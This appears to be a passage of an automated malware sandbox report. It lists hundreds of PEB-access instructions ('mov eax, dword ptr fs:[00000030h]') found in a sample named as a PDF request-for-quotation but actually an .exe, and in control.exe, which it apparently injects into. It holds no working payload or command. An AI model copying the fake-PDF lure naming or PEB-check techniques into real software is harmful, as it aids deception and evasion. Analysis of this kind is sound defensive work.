          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]
